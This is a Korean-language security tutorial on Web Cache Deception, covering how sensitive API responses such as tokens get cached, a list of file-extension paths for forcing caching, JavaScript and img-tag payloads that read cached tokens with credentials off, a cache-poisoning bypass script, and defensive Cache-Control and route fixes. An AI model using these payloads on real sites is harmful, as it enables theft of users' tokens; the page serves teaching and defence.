Web Cache Deception

Introduction

Web Cache Deception은 중요 정보를 리턴하는 API에서 해당 정보를 캐시하도록 설정되어 있거나, 처리 방식 미흡함을 이용하여 공격자가 임의로 사용자의 중요 정보를 캐시하고 SOP를 무시하여 정보를 탈취할 수 있는 공격 방법입니다.

만약 아래와 같이 중요한 정보가 Response로 제공되지만 SOP로 인해 보호되고 있는 상태인 경우 공격자가 해당 Response를 핸들링하여 해당 정보를 가져갈 수 없습니다. 물론 CORS 설정이 잘못된 경우 정보를 핸들링하여 가져갈 수 있고, 이는 보통 JSON Hijacking으로 표현합니다. 때때로 어떤 API들은 Response에 중요정보를 담고 있지만, Cache 관련 헤더를 통해 브라우저가 이를 캐시하도록 유도하는 경우가 있습니다.

GET /token HTTP/1.1

HTTP/1.1 200
Cache-Control: private, max-age=3600

{
  "token":"abcdfasdfas"
}

이러한 경우 이미 해당 URL의 데이터가 브라우저에 캐시되어 있기 때문에 XMLHttpRequest, $ajax 등으로 호출 시 withCredential을 false로 설정(이는 CORS: * 일 때 SOP를 무시하고 데이터를 가져올 수 있도록 처리하는 방법입니다. [참고/관련내용])하여 쿠키가 붙지 않은 요청이 전송되더라도 캐시된 결과를 리턴하기 떄문에 결과적으로 공격자가 중요정보를 읽을 수 있게 됩니다.

그리고 어떤 API들은 정확한 경로로만 호출할 수 있는게 아닌 wildcard를 사용하여 하위 경로나 다른 확장자로 호출해도 데이터를 리턴하는 경우가 있습니다.

REQ/RES 1

GET /token HTTP/1.1

HTTP/1.1 200
{
  "token":"abcdfasdfas"
}

REQ/RES 2

GET /token/abcd HTTP/1.1

HTTP/1.1 200
{
  "token":"abcdfasdfas"
}

이렇게 하위 경로나 확장자 등을 영향받지 않고 데이터를 리턴한다면 강제로 캐시를 유도하는 헤더가 없다고 해도 아래와 같이 css/js/jpg 등 브라우저가 캐시하려고 하는 확장자를 이용해서 response 정보를 캐시할 수 있습니다.

GET /token/abcd.jpg HTTP/1.1

HTTP/1.1 200
{
  "token":"abcdfasdfas"
}

이미 URL은 중요정보가 포함된 상태로 캐시됬기 떄문에 공격자가 다시 해당 파일을 인증 없는 상태로 재 요청하여 캐시된 결과를 받아올 수 있습니다. 결과적으로 SOP를 우회할 수 있는 방법이 됩니다.

<img src="https://target/token/abcd.jpg" style="width:1px; height:1px;" onload="getToken()">
<script>
function getToken(){
		var http = new XMLHttpRequest();
		http.onload = function(){
		  console.log(http.responseText);
		};
		http.open("GET", "https://target/token/abcd.jpg", true);
		http.withCredentials = false;
		http.send();
}
</script>

Offensive techniques

Detect

Cache Deception을 식별하려면 당연히 중요정보가 있는 API에서 캐시가 가능한지 테스트가 필요합니다. 기본적으로는 Response 헤더 내 Cache-Control을 통해 강제로 캐시를 유도하는지 체크하고, 별다른 캐시 설정이 없는 경우 이미지, JS 등 리소스 관련 확장자를 이용해 브라우저가 중요정보 페이지를 캐시할 수 있는지 테스트가 필요합니다.

Resource를 이용한 캐시 유도 예시

/token/payload.aif
/token/payload.aiff
/token/payload.au
/token/payload.avi
/token/payload.bin
/token/payload.bmp
/token/payload.cab
/token/payload.carb
/token/payload.cct
/token/payload.cdf
/token/payload.class
/token/payload.css
/token/payload.doc
/token/payload.dcr
/token/payload.dtd
/token/payload.gcf
/token/payload.gff
/token/payload.gif
/token/payload.grv
/token/payload.hdml
/token/payload.hqx
/token/payload.ico
/token/payload.ini
/token/payload.jpeg
/token/payload.jpg
/token/payload.js
/token/payload.mov
/token/payload.mp3
/token/payload.nc
/token/payload.pct
/token/payload.ppc
/token/payload.pws
/token/payload.swa
/token/payload.swf
/token/payload.txt
/token/payload.vbs
/token/payload.w32
/token/payload.wav
/token/payload.wbmp
/token/payload.wml
/token/payload.wmlc
/token/payload.wmls
/token/payload.wmlsc
/token/payload.xsd
/token/payload.zip

Exploitation

중요정보를 캐시할 수 있다면 이제 해당 정보를 img 태그 등으로 캐시한 후 데이터를 읽으면 됩니다. 이미 캐시된 데이터를 읽기 때문에 CORS: * 등 Response 핸들링에 제한이 있더라도 withCredentials를 false로 주어 이를 무시할 수 있습니다.

<img src="https://target/token/abcd.jpg" style="width:1px; height:1px;" onload="getToken()">
<script>
function getToken(){
		var http = new XMLHttpRequest();
		http.onload = function(){
		  console.log(http.responseText);
		};
		http.open("GET", "https://target/token/abcd.jpg", true);
		http.withCredentials = false;
		http.send();
}
</script>

Bypass protection

With Cache Poisoning

만약 서비스에 Web Cache Poisoning 취약점이 존재한다면, 이를 통해 Cache Deception을 유도할 수 있습니다. 만약 X-Unkeyd-Input 라는 헤더가 Poisoning의 unkeyd input으로 쓰일 수 있다면, 아래와 같이 해당 헤더를 포함한 요청을 발생시켜 캐시되도록 유도할 수 있습니다. 이 때 일반 페이지로 캐시하면 전역 캐시가 되기 때문에 특정 식별 정보(아래 예시에선 userid)를 파라미터로 붙여주어 Cache busting 처리를 하면 개개인 세션마다 중요정보를 캐시할 수 있습니다.

Req

GET /token/?userid=1234
X-Unkeyd-Input: 1234

Script

function sleep(ms) {
  const wakeUpTime = Date.now() + ms;
  while (Date.now() < wakeUpTime) {}
}

// Unkeyed Input을 통해 캐시합니다.
var http = new XMLHttpRequest();
http.open("GET", "https://target/token/?userid=1234", true);
http.withCredentials = true;
http.setRequestHeader("X-Unkeyed-Input","1234")
http.send();

// 위 요청이 캐시되기까지 약간 기다립니다.
sleep(3000);

// 캐시된 결과를 읽어옵니다.
var http = new XMLHttpRequest();
http.open("GET", "https://target/token/?userid=1234", true);
http.onload = function(){
		  console.log(http.responseText);
		};
http.withCredentials = false;
http.send();

Defensive techniques

대응방안은 간단합니다. 중요정보를 다루는 API에 대해선 캐시될 여지를 남겨놓지 않는게 좋습니다. 일반적으로 cache-control 헤더를 통해 no-store 등 캐시하지 않도록 설정하면 됩니다.

Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0

또한 중요정보 API들은 handler 등에서 정확한 URL로만 사용할 수 있도록 wildcard 처리는 제거합니다.

e.g golang-echo - before

e.GET("/token/*", func(c echo.Context) error {
	// Logic ...
	return c.JSON(http.StatusOK, r)
})

e.g golang-echo - after

e.GET("/token/", func(c echo.Context) error {
	// Logic ...
	return c.JSON(http.StatusOK, r)
})

Tools

• web cache deception scanner in burpsuite
• https://github.com/PortSwigger/param-miner in burpsuite
• fuzzer in ZAP

References

• https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Web Cache Deception